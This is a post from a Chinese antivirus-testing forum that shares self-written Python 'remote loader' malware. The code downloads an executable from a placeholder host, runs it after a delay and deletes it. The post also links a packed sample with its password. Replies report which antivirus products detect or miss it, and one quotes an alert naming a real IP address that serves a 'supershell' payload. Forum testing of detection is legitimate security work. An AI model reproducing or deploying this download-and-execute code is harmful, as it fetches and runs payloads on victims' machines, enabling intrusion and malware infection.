查看: 2762|回复: 39
收起左侧

[病毒样本] 自制远程加载-python

  [复制链接]
An_spectator
发表于 2023-9-25 11:13:33 | 显示全部楼层 |阅读模式
  1. import requests
  2. import subprocess
  3. import time

  4. # 远程Shellcode文件的URL
  5. remote_shellcode_url = "http://xxxx.com/1.exe"

  6. def load_and_execute_shellcode():
  7.     # 下载远程Shellcode文件
  8.     response = requests.get(remote_shellcode_url)
  9.     if response.status_code == 200:
  10.         # 将下载的内容保存为本地临时文件
  11.         with open("temp.exe", "wb") as f:
  12.             f.write(response.content)

  13.         # 延迟启动时间(单位为秒)
  14.         delay = 5

  15.         # 延迟启动
  16.         time.sleep(delay)

  17.         # 在内存中执行Shellcode文件
  18.         subprocess.call(["temp.exe"])

  19.         # 删除临时文件
  20.         subprocess.call("del temp.exe")
  21.     else:
  22.         print("无法下载远程Shellcode文件")

  23. # 调用加载器函数
  24. load_and_execute_shellcode()
复制代码
以上是源码内容

打包后的样本:https://wwcu.lanzouj.com/i7xHT19ug9kb
密码:5hup

装甲未被击穿
发表于 2023-9-25 11:20:31 | 显示全部楼层
本帖最后由 装甲未被击穿 于 2023-9-25 17:10 编辑

AVAST MISS 已发送--------------------------
更新:已拉黑

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
aikafans + 1 avast 爱你

查看全部评分

swizzer
发表于 2023-9-25 11:28:48 | 显示全部楼层
本帖最后由 swizzer 于 2023-9-25 12:02 编辑

与其说是Loader不如说是Downloader...



评分

参与人数 1人气 +3 收起 理由
神龟Turmi + 3

查看全部评分

dght432
发表于 2023-9-25 11:30:05 | 显示全部楼层
类型:木马-HEUR/QVM202.0.3709.Malware.Gen
描述:木马是一种伪装成正常文件的恶意软件,会盗取您的帐号、密码等隐私资料。
扫描引擎:云特征引擎
文件路径:D:\下载\8\8.exe
文件大小:10.11M (10,599,208 字节)
文件指纹(MD5):c068bebd474faa6821857298f3d26eb2
处理建议:隔离文件
骨灰级小白
发表于 2023-9-25 11:31:47 | 显示全部楼层
实机双击WD无提示,毛豆直接入沙,运行失败

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
761773275
发表于 2023-9-25 11:49:00 | 显示全部楼层
BEST
  1. HyperDetect 机器学习检测到威胁. 访问该网站被拒绝。118.89.125.171:8888/supershell/server/files/download/1.exe 包含类型为 Gen:Illusion.Mustang.5.2020100 的恶意软件
复制代码
UNknownOoo
发表于 2023-9-25 11:51:44 | 显示全部楼层
火绒
扫描:MISS

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
初心.杰
发表于 2023-9-25 11:54:02 | 显示全部楼层
本帖最后由 初心.杰 于 2023-9-25 19:38 编辑

趋势 miss    诺顿 kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
初心.杰
发表于 2023-9-25 11:54:42 | 显示全部楼层

AVAST 哪里能提交样本啊
装甲未被击穿
发表于 2023-9-25 12:00:23 | 显示全部楼层
初心.杰 发表于 2023-9-25 11:54
AVAST 哪里能提交样本啊

可以网页上报,https://www.avast.com/false-positive-file-form.php#pc
也可把样本手动加进隔离区,然后右键,选择发送到实验室
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-1 10:35 , Processed in 0.129033 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表